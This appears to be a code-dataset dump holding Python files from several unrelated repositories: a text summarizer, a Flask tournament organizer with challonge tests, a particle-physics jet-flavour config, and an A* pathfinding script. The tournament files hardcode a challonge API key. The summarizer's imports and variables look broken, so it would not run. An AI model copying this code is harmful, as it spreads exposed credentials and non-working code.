TfidfVectorizer\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, \\\nfrom sklearn.model_selection import cross_val_score, learning_curve\nfrom sklearn.metrics import precision_recall_curve, confusion_matrix, \\\n precision_score, recall_score, accuracy_score\n\n# Functions\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\n# Set seed\nseed(32)\n\n# Extract\nprint(\"Extract\")\nwith open(\"../../data/raw/bitcoin.txt\") as file:\n doc = file.read()\n\n# Transform\nprint(\"Transform\")\nsents = nltk.sent_tokenize(doc)\n\n\nscores = load_obj(\"scores\")\n\nscores = [(x,y) for (x,y) in scores.items()]\nscores = sorted(scores, key= lambda x: float(x[1]), reverse=True)\nscores = [x for (x,y) in scores]\noutput = \"\\n\\n\".join([sents[score] for score in scores])[0:10000]\n\n# Write\nf = open(\"../../data/output/output2.txt\", \"w\")\nf.write(output)\nf.close()\n\n# for i in sorted (scores.values()) :\n# print(i, end = \" \")\n" }, { "alpha_fraction": 0.7006094455718994, "alphanum_fraction": 0.7064499855041504, "avg_line_length": 28.60902214050293, "blob_id": "b065fe3e17b366427c171d7d31ac189108345474", "content_id": "8d04959fc525d496589c4e556161e46ce276ad21", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3938, "license_type": "permissive", "max_line_length": 132, "num_lines": 133, "path": "/src/main/old/1.etl.py", "repo_name": "Peter-32/summarize1", "src_encoding": "UTF-8", "text": "# Add this project to the path\nimport os; import sys; currDir = os.path.dirname(os.path.realpath(\"__file__\"))\nrootDir = os.path.abspath(os.path.join(currDir, '..')); sys.path.insert(1, rootDir)\n\n# Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Public modules\nimport re\nimport os\nimport nltk\nimport spacy\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom os 
import path\nimport networkx as nx\nimport lightgbm as lgb\nfrom pandas import read_csv\nfrom sklearn.svm import SVC\nfrom numpy.random import seed\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nfrom nltk.corpus import stopwords\nfrom sklearn.pipeline import Pipeline\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.decomposition import TruncatedSVD\n OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.random_projection import GaussianRandomProjection\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, \\\nfrom sklearn.model_selection import cross_val_score, learning_curve\nfrom sklearn.metrics import precision_recall_curve, confusion_matrix, \\\n precision_score, recall_score, accuracy_score\n\n# Functions\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\n# Set seed\nseed(32)\n\n# Initialize Helper Objects\nprint(\"Initialize Helper Objects\")\nwnl = nltk.WordNetLemmatizer()\ntfidf = TfidfVectorizer()\nnlp = spacy.load('en_core_web_md')\n\n# Extract\nprint(\"Extract\")\nwith open(\"../../data/raw/bitcoin.txt\") as file:\n doc = file.read()\n\n# Transform\nprint(\"Transform\")\ndoc = doc.lower()\ntokens = word_tokenize(guide)\ntext = nltk.Text(tokens)\nwords = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in text]\nwords = [wnl.lemmatize(w) for w in words if w.strip() != ''] # Will take work later to get the original text back without lemmatize.\nsents = nltk.sent_tokenize(guide)\n\n# Get dictionaries\nprint(\"Dictionaries\")\ntfidf.fit(words)\ntfidf_weights_dict = dict(zip(tfidf.get_feature_names(), tfidf.idf_))\nembeddings_dict = {}\nfor val in tfidf_weights_dict:\n embeddings_dict[val] = nlp(val).vector\n\n# Averaged Vectors\nprint(\"Embeddings\")\nsent_vectors = []\nfor sent in sents:\n tokens = word_tokenize(sent)\n text = nltk.Text(tokens)\n words = [re.sub(r'[^A-Za-z_\\s]', '', w) for w in text]\n words = [wnl.lemmatize(w) for w in words if w.strip() != '']\n vector_sum, denominator = [0]*300, 0\n for word in words:\n try:\n vector_sum += embeddings_dict[word]*tfidf_weights_dict[word]\n denominator += tfidf_weights_dict[word]\n except:\n pass\n if denominator != 0:\n sent_vectors.append(vector_sum/denominator)\n else:\n sent_vectors.append(vector_sum)\n\n# Similarity Matrix\nprint(\"Similarity matrix\")\nsim_mat = np.zeros([len(sents), len(sents)])\nfor i in range(len(sents)):\n for j in range(len(sents)):\n if i != j:\n sim_mat[i][j] = cosine_similarity(sent_vectors[i].reshape(1,300), sent_vectors[j].reshape(1,300))[0,0]\nprint(sim_mat)\n\n# Graph\nprint(\"GraphX\")\nnx_graph = nx.from_numpy_array(sim_mat)\nscores = nx.pagerank(nx_graph)\nprint(scores)\n\nsave_obj(scores, \"scores\")\n\n\nprint(len(sent_vectors))\nprint(sent_vectors[-3:])\nprint(scores)\n# words = [wnl.lemmatize(w) for w in words]\n# words = [w for w in words if w not in the_stopwords and w != '']\n\n\n\n\n\nprint(guide[-400:])\n" } ]
3
gitter-badger/auTO-2
https://github.com/gitter-badger/auTO-2
91dd2236c80585b3c43215ea61b1ab13d86af0e5
2c5bda6fb22107c0feab4a74860ae7400a0a7d53
3a8d0698a91069bf51418396a9628e8af803b227
refs/heads/master
2021-01-18T20:14:35.344117
2016-05-16T01:01:05
2016-05-16T01:01:05
59,715,282
0
0
null
2016-05-26T03:02:52
2016-05-17T22:44:03
2016-05-17T06:12:21
null
[ { "alpha_fraction": 0.67100590467453, "alphanum_fraction": 0.6745561957359314, "avg_line_length": 35.739131927490234, "blob_id": "bfd92683056fff454834621a1cd9d99cab1c42ce", "content_id": "104f18f4345aca1c0111d079dd82a67ff91c3219", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 845, "license_type": "no_license", "max_line_length": 72, "num_lines": 23, "path": "/src/test/test_challonge.py", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "import challonge\nimport unittest\n\n\nclass TestChallonge(unittest.TestCase):\n def setUp(self):\n self.api_username = 'davethecust'\n self.api_key = 'bMSeYjdu2GA5CtC4Dc3dPz8l6C1VgS4x5bpnV4cv'\n self.tournament_url = '42k5wcre'\n\n def test_get_tournament(self):\n challonge.set_credentials(self.api_username, self.api_key)\n tournament = challonge.tournaments.show(self.tournament_url)\n self.assertEqual(tournament['name'], 'test')\n\n def test_get_participants(self):\n challonge.set_credentials(self.api_username, self.api_key)\n tournament = challonge.tournaments.show(self.tournament_url)\n participants = challonge.participants.index(tournament[\"id\"])\n\n test_players = ['DTMP', 'zaxtorp', 'hamroctopus', 'davethecust']\n for player in participants:\n self.assertIn(player['name'], test_players)\n" }, { "alpha_fraction": 0.7215189933776855, "alphanum_fraction": 0.746835470199585, "avg_line_length": 14.800000190734863, "blob_id": "b74cd64fef91a2925427bc8a43611993ffe29fcf", "content_id": "c9a0184a3ce049a44871a321f52fba3dbb459104", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 158, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/requirements.txt", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "# auTO requirements #\nFlask\n\n# challonge + deps #\npython-dateutil\niso8601\n-e git+http://github.com/russ-/pychallonge#egg=pychallonge\n\n# raspi deps #\npibrella\n" }, { "alpha_fraction": 0.6625000238418579, "alphanum_fraction": 0.6642857193946838, "avg_line_length": 18.310344696044922, "blob_id": "c9c0729bd79f7826b46047ceb0903ab79927694f", "content_id": "26dcbaa5b9f3fc87c207e30bc45fcad912514464", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/src/server/app.py", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "import sys\nimport pdb\n\nimport challonge\nfrom flask import Flask\n\n#from client/prototype_client.py import client as prototype_client\n\napi_email = 'davethecust'\napi_key = 'bMSeYjdu2GA5CtC4Dc3dPz8l6C1VgS4x5bpnV4cv'\n\napp = Flask('auTO')\n\[email protected]('/dump', methods=['PUT'])\ndef state_dump():\n pass\n \[email protected]('/sync_state', methods=['GET'])\ndef sync_state():\n pass\n\ndef configure():\n challonge.set_credentials(api_email, api_key)\n \t\nif __name__ == \"__main__\":\n configure()\n tournament_url = sys.argv[1] \n tournament = challonge.tournaments.show(tournament_url)\n app.run()\n" }, { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.4516128897666931, "avg_line_length": 30, "blob_id": "7805e404f1a0f976a59a8ba83ef1a3c02395db57", "content_id": "c9c47edab9cabb49115b9ef69ef92897e78ffbc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 62, "license_type": "no_license", "max_line_length": 30, 
"num_lines": 2, "path": "/README.rst", "repo_name": "gitter-badger/auTO-2", "src_encoding": "UTF-8", "text": "Automatic Tournament Organizer\n==============================\n" } ]
4
bmarzocc/PhysicsTools
https://github.com/bmarzocc/PhysicsTools
953bb9f47d454237b2588a306bad2e7e910b3be1
e6e437c47e1b0aaa2e316fb5d35b721ffb34bc94
be207c0e6f9c0733045bd70561ef4b0c605cb044
refs/heads/master
2021-01-21T07:00:33.420730
2013-12-13T14:03:26
2013-12-13T14:03:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7446327805519104, "alphanum_fraction": 0.7548022866249084, "avg_line_length": 32.358489990234375, "blob_id": "b10617e76ac40b75794a9ca178aa8f5e5039024b", "content_id": "b4a20c7e98bdc7ecde28f76e72bbadf1d56ec448", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 131, "num_lines": 53, "path": "/JetFlavourReader/test/printJetFlavour.py", "repo_name": "bmarzocc/PhysicsTools", "src_encoding": "UTF-8", "text": "import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"testJET\")\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"SimGeneral.HepPDTESSource.pythiapdt_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring('/store/caf/user/bmarzocc/RadionToHHTo2G2B_M-300_TuneZ2star_8TeV-nm-madgraph_AODSIM_18.root')\n)\n\nprocess.printTree = cms.EDAnalyzer(\"ParticleListDrawer\",\n src = cms.InputTag(\"genParticles\"),\n maxEventsToPrint = cms.untracked.int32(1)\n)\n\nprocess.myPartons = cms.EDProducer(\"PartonSelector\",\n withLeptons = cms.bool(False),\n src = cms.InputTag(\"genParticles\")\n)\n\nprocess.flavourByRef = cms.EDProducer(\"JetPartonMatcher\",\n jets = cms.InputTag(\"ak5PFJets\"),\n coneSizeToAssociate = cms.double(0.3),\n partons = cms.InputTag(\"myPartons\")\n)\n\nprocess.flavourByVal = cms.EDProducer(\"JetFlavourIdentifier\",\n srcByReference = cms.InputTag(\"flavourByRef\"),\n physicsDefinition = cms.bool(False)\n)\n\nprocess.printEvent = cms.EDAnalyzer(\"printJetFlavour\",\n srcSelectedPartons = cms.InputTag(\"myPartons\"),\n srcByReference = cms.InputTag(\"flavourByRef\"),\n srcByValue = cms.InputTag(\"flavourByVal\")\n)\n\nprocess.printEventNumber = cms.OutputModule(\"AsciiOutputModule\")\n\n#process.TFileService = cms.Service(\"TFileService\",\n# fileName = cms.string('prova.root')\n#)\n\nprocess.p = cms.Path(process.printTree*process.myPartons*process.flavourByRef*process.flavourByVal*process.printEvent)\nprocess.outpath = cms.EndPath(process.printEventNumber)\nprocess.MessageLogger.destinations = cms.untracked.vstring('cout','cerr')\n#process.MessageLogger.cout = cms.PSet(\n# threshold = cms.untracked.string('ERROR')\n#)\n\n\n" }, { "alpha_fraction": 0.7352380752563477, "alphanum_fraction": 0.738095223903656, "avg_line_length": 44.60869598388672, "blob_id": "d35d373216290faf7218b1a581e84436f5db7c67", "content_id": "a6c9609603ebb006a918b944cc7dc3df4fd1352e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1050, "license_type": "no_license", "max_line_length": 143, "num_lines": 23, "path": "/README.md", "repo_name": "bmarzocc/PhysicsTools", "src_encoding": "UTF-8", "text": "PhysicsTools\n============\n\n1) JetFlavourReader:\n \n Vary simple analyzer (JetFlavourReader/plugins/printJetFlavour.cc) exploting CMSSW tools:\n \n SimDataFormats/JetMatching/interface/JetFlavour.h\n SimDataFormats/JetMatching/interface/JetFlavourMatching.h\n SimDataFormats/JetMatching/interface/MatchedPartons.h\n SimDataFormats/JetMatching/interface/JetMatchedPartons.h\n \n it can be launched in local by means of: JetFlavourReader/test/printJetFlavour.py\n or be launched in grid by means of: JetFlavourReader/test/crab/crab_printJetFlavour.cfg\n \n This analyzer can run on AODSIM format.\n \n The output is a txt. 
For each jet it's written:\n \n event_luminosy - event_id - jet_pt jet - jet_eta - jet_phi - jet_energy - jet_flavour - #_processed_jet - #_processed_jet with flavour != 0\n \n If you want to have h2globe read the output, in order to fill the flattrees jet_flavour branch, you must put it\n in /afs/cern.ch/work/b/bmarzocc/public/RadionAnalysis_DONOTREMOVE/. Be careful to the output name! \n" } ]
2
Manaro-Alpha/Astar
https://github.com/Manaro-Alpha/Astar
b642be263f7e2477602a111d26e874fdddc4a511
d98aa7758326da4d3d0d8fa89b9485fa807cc907
34116777d00778f91088d0c60915cc2d7b6bd372
refs/heads/main
2023-07-19T14:01:59.427633
2021-09-10T16:33:25
2021-09-10T16:33:25
405,143,257
0
0
null
2021-09-10T16:22:30
2021-09-10T16:22:33
2021-09-10T16:33:26
null
[ { "alpha_fraction": 0.5369332432746887, "alphanum_fraction": 0.5714043378829956, "avg_line_length": 35.577640533447266, "blob_id": "62f9093cac503651d73b04ffd1898f9e4a3ebd68", "content_id": "3b123c5c7305eff1133e7678a8bb97a0b0620aac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5889, "license_type": "no_license", "max_line_length": 307, "num_lines": 161, "path": "/Astar.py", "repo_name": "Manaro-Alpha/Astar", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport operator\nfrom shapely.geometry import Point, Polygon, LineString\nfrom itertools import product,permutations\n\n\nclass Node:\n def __init__(self,x,y,cost,parent,nearest_nodes,index):\n self.x=x\n self.y=y\n self.parent=parent\n self.cost=cost\n self.nearest_nodes=nearest_nodes\n self.index=index\n\nclass Astar:\n obstacle_list=[[(2, 10), (7, 10), (6, 7), (4, 7), (4, 9), (2, 9)],[(3, 1), (3, 6), (4, 6), (4, 1)],[(7, 3), (7, 8), (9, 8), (9, 3)]]\n \n def within(obstacle_list,rnd_node):\n #checking if point is valid\n isWithin=False\n point=Point(rnd_node[0],rnd_node[1])\n if(point.within(Polygon(obstacle_list[0]))==True or point.within(Polygon(obstacle_list[1]))==True or point.within(Polygon(obstacle_list[2]))==True):\n isWithin=True\n return isWithin\n\n def cross(obstacle_list,rnd_node,x,y):\n isCrosses=False\n point=Point(rnd_node[0],rnd_node[1])\n node=(x,y)\n coord=(rnd_node,node)\n line=LineString(coord)\n if(line.crosses(Polygon(obstacle_list[0]))==True or line.crosses(Polygon(obstacle_list[1]))==True or line.crosses(Polygon(obstacle_list[2]))==True or point.touches(Polygon(obstacle_list[0]))==True or point.touches(Polygon(obstacle_list[1])) ==True or point.touches(Polygon(obstacle_list[2]))==True):\n isCrosses=True\n return isCrosses\n\n\n start=(0,0)\n goal=(10,10)\n num_nodes=1000\n rate=0.8\n \n #Generating the node network\n nodes=[]\n nodes.append(Node(start[0],start[1],0,0,[],0))\n a=np.arange(0,10.5,0.5).tolist()\n b=list(product(a,repeat=2))\n for coord in b:\n if(within(obstacle_list,coord)==True):\n continue\n nodes.append(Node(coord[0],coord[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)-1):\n dist=math.sqrt((coord[0]-nodes[i].x)**2 + (coord[1]-nodes[i].y)**2)\n if(dist<rate and cross(obstacle_list,coord,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n \n ''' nodes.append(Node(goal[0],goal[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)):\n dist=math.sqrt((nodes[i].x-goal[0])**2 + (nodes[i].y-goal[1])**2)\n if(dist<rate and cross(obstacle_list,goal,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n '''\n \n ''' for i in range(0,num_nodes):\n rnd_node=(random.uniform(0,10),random.uniform(0,10))\n node=Node(rnd_node[0],rnd_node[1],0,0,[],len(nodes))\n\n if(within(obstacle_list,rnd_node)==True):\n continue\n nodes.append(node)\n\n for i in range(0,len(nodes)-1):\n dist=math.sqrt((rnd_node[0]-nodes[i].x)**2 + (rnd_node[0]-nodes[i].y)**2)\n if(dist<=rate and cross(obstacle_list,rnd_node,nodes[i].x,nodes[i].y)==False):\n nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n\n nodes.append(Node(goal[0],goal[1],0,0,[],len(nodes)))\n for i in range(0,len(nodes)):\n dist=math.sqrt((nodes[i].x-goal[0])**2 + (nodes[i].y-goal[1])**2)\n if(dist<=rate and cross(obstacle_list,rnd_node,nodes[i].x,nodes[i].y)==False):\n 
nodes[i].nearest_nodes.append(len(nodes)-1)\n nodes[len(nodes)-1].nearest_nodes.append(i)\n\n '''\n \n #Astar\n #start\n open_list=[]\n IsGoal=False\n for node in nodes:\n node.cost=1000000000\n nodes[0].cost=0\n for index in nodes[0].nearest_nodes:\n nodes[index].cost=math.sqrt((nodes[0].x-nodes[index].x)**2 + (nodes[0].y-nodes[index].y)**2) + math.sqrt((nodes[index].x-goal[0])**2 + (nodes[index].y-goal[1])**2)\n nodes[index].parent=0\n \n for node in nodes:\n open_list.append([node.index,node.cost])\n open_list.sort(key=lambda x:x[1])\n\n while(IsGoal==False and len(open_list)>0):\n if(open_list[0][0]==len(nodes)-1): \n #len(nodes)-1 is the last nodes index \n IsGoal=True\n \n for index in nodes[open_list[0][0]].nearest_nodes:\n cost=open_list[0][1] + math.sqrt((nodes[open_list[0][0]].x-nodes[index].x)**2 + (nodes[open_list[0][0]].y-nodes[index].y)**2) + math.sqrt((nodes[index].x-goal[0])**2 + (nodes[index].y-goal[1])**2)\n if(cost<nodes[index].cost):\n nodes[index].cost=cost\n nodes[index].parent=open_list[0][0]\n \n open_list.pop(0)\n for array in open_list:\n array[1]=nodes[array[0]].cost\n open_list.sort(key=lambda x:x[1])\n\n poly1=Polygon(obstacle_list[0])\n poly2=Polygon(obstacle_list[1])\n poly3=Polygon(obstacle_list[2])\n x1,y1=poly1.exterior.xy\n x2,y2=poly2.exterior.xy\n x3,y3=poly3.exterior.xy\n plt.plot(x1,y1)\n plt.plot(x2,y2)\n plt.plot(x3,y3)\n #plotting the nodes and path\n '''\n for node in nodes:\n for index in node.nearest_nodes:\n plt.scatter([node.x,nodes[index].x],[node.y,nodes[index].y],color='r')\n '''\n \n current=len(nodes)-1\n plot_list=[]\n\n while(current!=0):\n plot_list.append(nodes[current])\n current=nodes[current].parent\n\n plot_list.append(Node(start[0],start[1],0,0,[],0))\n plot_list.reverse()\n i=0\n while i<len(plot_list)-1:\n plt.plot([plot_list[i].x,plot_list[i+1].x],[plot_list[i].y,plot_list[i+1].y],color='blue')\n i=i+1\n for node in plot_list:\n plt.scatter(node.x,node.y,color='blue',s=30)\n \ndef main():\n print(\"start planning\")\n astar=Astar()\n\nif __name__=='__main__':\n print(\"start\")\n main()\nplt.show()\n" } ]
1
darachm/freebarcodes
https://github.com/darachm/freebarcodes
5ec8a2c0d3d3efd2f492323f943a6a63d72d956d
32942d05154af5cdc3ddfbc56e8d733030cdd5dd
9b196e88fb1670b81ca882d5fd0560a60fab312e
refs/heads/master
2020-06-01T02:31:13.511630
2019-06-06T21:14:13
2019-06-06T21:14:13
190,598,088
0
0
null
2019-06-06T14:44:03
2019-05-13T21:32:30
2019-05-13T21:32:27
null
[ { "alpha_fraction": 0.555782675743103, "alphanum_fraction": 0.5654653310775757, "avg_line_length": 39.76754379272461, "blob_id": "1ce174398dd8c26526c120ccd0a8234dee7093c6", "content_id": "e90476bd57b4c1365e4328230eb127c429abc025", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9295, "license_type": "no_license", "max_line_length": 119, "num_lines": 228, "path": "/freebarcodes/generate.py", "repo_name": "darachm/freebarcodes", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport numpy as np\nimport FreeDivSphere\nimport editmeasures\nfrom seqtools import bases, dna_rev_comp, dna2num, num2dna\nimport psutil\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\ndef possible_barcode_iterator(k, AT_max, GC_max):\n \"\"\"\n Iterates all k-mers such that:\n AT count <= AT_max\n GC count <= GC_max\n No triplet homopolymers\n\n k :int: barcode k-mer length\n AT_max :int:\n GC_max :int:\n \"\"\"\n bases_and_incs = [('A', np.array([1, 0, 0, 0])),\n ('C', np.array([0, 1, 0, 0])),\n ('G', np.array([0, 0, 1, 0])),\n ('T', np.array([0, 0, 0, 1]))]\n\n def recursive_extension(prev_seq, prev_cnt): # No defaults\n bad_bases = ''\n if prev_seq[-2] == prev_seq[-1]: # Don't allow triplets\n bad_bases += prev_seq[-1]\n if prev_seq[-1] == 'G': # Illumina has higher errors with GGC\n bad_bases += 'C'\n if prev_cnt[0] + prev_cnt[3] == AT_max: # Enforce AT/GC content within bounds\n bad_bases += 'AT'\n elif prev_cnt[1] + prev_cnt[2] == GC_max:\n bad_bases += 'CG'\n for i in range(len(prev_seq)-4): # Don't allow rev-comp seqs of 3+ bp\n if dna_rev_comp(prev_seq[i+1:i+3]) == prev_seq[-2:]:\n bad_bases += dna_rev_comp(prev_seq[i])\n\n\n if len(prev_seq) + 1 == k:\n for base in bases:\n if base in bad_bases:\n continue\n else:\n yield prev_seq + base\n else:\n for base, inc in bases_and_incs:\n if base in bad_bases:\n continue\n for seq in recursive_extension(prev_seq + base, prev_cnt + inc):\n yield seq\n\n def iterate_seqs():\n for b1, c1 in bases_and_incs:\n for b2, c2 in bases_and_incs:\n for seq in recursive_extension(b1 + b2, c1 + c2):\n yield seq\n\n return iterate_seqs\n\n\ndef idx_possible_barcode_iterator(k, AT_max, GC_max):\n def iterate_seqs():\n for seq in possible_barcode_iterator(k, AT_max, GC_max)():\n yield dna2num(seq)\n return iterate_seqs\n\n\nclass FreeDivBarcodeGenerator(object):\n \"\"\"\n A class to generate a set of barcodes via the FreeDiv semimetric.\n \"\"\"\n # Algorithm explanation:\n # \n # In a metric space, one can reserve spheres around each new codeword of radius 2*max_err, and\n # any remaining word not reserved by any codeword is a valid new codeword. The FreeDiv\n # semimetric does not give that guarantee. However, the above algorithm is still useful in\n # that any word so reseved is guaranteed to not be a valid codeword. Hence, we perform the\n # following steps:\n #\n # 1. Alphabetically iterate (for the Conway closure) through the words of acceptable\n # composition until finding a word still marked with int(0). For that word, check its\n # decode sphere. If all words in the decode sphere are marked < int(2), add codeword.\n # 2. After adding a codeword, reseve two surrounding spheres of different radii:\n # -A sphere of radius max_err, the decode sphere, marked with int(2)\n # -A sphere of radius 2*max_err, the approx encode sphere, marked with int(1), careful to\n # not overwrite any 2's\n # 3. 
Repeat until space exhausted.\n\n def __init__(self, bc_len, max_err, seq_idx_iter_func=None):\n self.bc_len = bc_len\n self.max_err = max_err\n self._codewords = set()\n self.barcodes = set()\n self.manual_codewords = set()\n needed_bytes = 4**self.bc_len\n available_bytes = psutil.virtual_memory().available\n if needed_bytes > available_bytes:\n raise RuntimeError('Not enough memory. {:,d} bytes needed, {:,d} bytes available'.format(\n needed_bytes,\n available_bytes\n ))\n\n self.reserved_words = np.zeros((needed_bytes, ), dtype=np.uint8)\n if seq_idx_iter_func is not None:\n self.seq_idx_iter_func = seq_idx_iter_func\n else:\n self.seq_idx_iter_func = lambda : xrange(4**self.bc_len)\n\n def _add_codeword(self, cw_idx):\n assert isinstance(cw_idx, int), '{} is not a valid codeword. Must be int'.format(cw_idx)\n self._codewords.add(cw_idx)\n for seq_idx in self.iterate_approx_encode_sphere(cw_idx):\n if self.reserved_words[seq_idx] == 0:\n # Important to not overwrite previous 2's\n self.reserved_words[seq_idx] = 1\n for seq_idx in self.iterate_decode_sphere(cw_idx):\n self.reserved_words[seq_idx] = 2\n\n def iterate_decode_sphere(self, center_idx):\n word = num2dna(center_idx, self.bc_len)\n for seq_idx in FreeDivSphere.FreeDivSphere(word, self.max_err).parallel_num_iterator():\n yield seq_idx\n\n def iterate_approx_encode_sphere(self, center_idx):\n word = num2dna(center_idx, self.bc_len)\n for seq_idx in FreeDivSphere.FreeDivSphere(word, 2*self.max_err, min_r=self.max_err+1).parallel_num_iterator():\n yield seq_idx\n\n def _add_barcode(self, seq_idx):\n assert self._idx_is_available(seq_idx), seq_idx\n self.barcodes.add(seq_idx)\n self._codewords.add(seq_idx)\n self._add_codeword(seq_idx)\n\n def add_dnastr_nonbarcode_codeword(self, dnastring):\n seq_idx = dna2num(dnastring)\n self.add_idx_nonbarcode_codeword(seq_idx)\n \n def add_idx_nonbarcode_codeword(self, seq_idx):\n self.manual_codewords.add(seq_idx)\n self._add_codeword(seq_idx)\n\n def dnastr_codeword_is_available(self, dnastring):\n seq_idx = dna2num(dnastring)\n self._idx_is_available(seq_idx)\n \n def _idx_is_available(self, test_idx):\n if self.reserved_words[test_idx] != 0:\n return False\n else:\n for seq_idx in self.iterate_decode_sphere(test_idx):\n if self.reserved_words[seq_idx] == 2:\n return False\n return True\n\n def Conway_closure(self, tmp_fpath=None):\n for seq_idx in self.seq_idx_iter_func():\n if self._idx_is_available(seq_idx):\n self._add_barcode(seq_idx)\n log.info('Found barcode {}'.format(len(self.barcodes) + 1))\n if tmp_fpath:\n with open(tmp_fpath, 'a') as out:\n out.write('{}\\n'.format(num2dna(seq_idx, self.bc_len)))\n\n def Conway_closure_until_satisfied(self, n_desired_barcodes):\n for seq_idx in self.seq_idx_iter_func():\n if self._idx_is_available(seq_idx):\n self._add_barcode(seq_idx)\n log.info('Found barcode {}: {}'.format(len(self.barcodes) + 1,\n num2dna(seq_idx, self.bc_len)))\n if len(self.barcodes) >= n_desired_barcodes:\n return\n\n @property\n def dna_barcodes(self):\n return (num2dna(seq_idx, self.bc_len) for seq_idx in self.barcodes)\n\n def manual_barcodes_test(self):\n bc_list = list(self.barcodes)\n for i in range(len(self.barcodes)):\n bc1 = num2dna(bc_list[i], self.bc_len)\n for j in range(i+1, len(self.barcodes)):\n bc2 = num2dna(bc_list[j], self.bc_len)\n dist = editmeasures.free_divergence(bc1, bc2)\n if dist < self.max_err:\n log.error('!'*10 + ' FAIL ' + '!'*10)\n log.error('Distance {} between {} and {}.'.format(dist, bc1, bc2))\n return\n log.info('Barcodes Pass Manual 
Check')\n\n\ndef generate_barcodes(arguments):\n import time\n start_time = time.time()\n fpath = os.path.join(arguments.output_dir,\n 'barcodes{}-{}.txt'.format(arguments.barcode_length,\n arguments.num_errors))\n tmp_fpath = os.path.join(arguments.output_dir,\n 'barcodes{}-{}.txt.tmp'.format(arguments.barcode_length,\n arguments.num_errors))\n GC_max = min(range(arguments.barcode_length), key=lambda x:\n abs(float(x)/arguments.barcode_length-0.6))\n log.info('Barcode length: {}'.format(arguments.barcode_length))\n log.info('AT/GC max: {}'.format(GC_max))\n bc_iter = idx_possible_barcode_iterator(arguments.barcode_length, GC_max, GC_max)\n sbg = FreeDivBarcodeGenerator(arguments.barcode_length,\n arguments.num_errors,\n bc_iter)\n sbg.Conway_closure(tmp_fpath=tmp_fpath)\n with open(fpath, 'w') as out:\n out.write('\\n'.join(sorted(sbg.dna_barcodes)))\n os.remove(tmp_fpath)\n comp_time = time.time() - start_time\n log.info('Barcode generation time: {}'.format(comp_time))\n\n\nif __name__ == '__main__':\n usg = '{} <bc_len> <max_err> <out_dir>'.format(sys.argv[0])\n if len(sys.argv) != len(usg.split()):\n sys.exit('Usage: {}'.format(usg))\n bc_len, max_err = map(int, sys.argv[1:3])\n dpath = sys.argv[3]\n write_barcodes(bc_len, max_err, dpath)\n" }, { "alpha_fraction": 0.42268040776252747, "alphanum_fraction": 0.6597937941551208, "avg_line_length": 12.857142448425293, "blob_id": "5c4aa417d08eaadb229d6b2a6a29953132fcb38b", "content_id": "c3df75b52f476aef619141f0679010c3b1c1f1fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 97, "license_type": "no_license", "max_line_length": 15, "num_lines": 7, "path": "/requirements.txt", "repo_name": "darachm/freebarcodes", "src_encoding": "UTF-8", "text": "pathos==0.2.1\npsutil==5.3.1\nh5py==2.7.1\nnumpy==1.13.3\ndocopt==0.6.2\nbiopython==1.70\ncython==0.24\n" } ]
2
NickJacksonDev/DnD-Manager
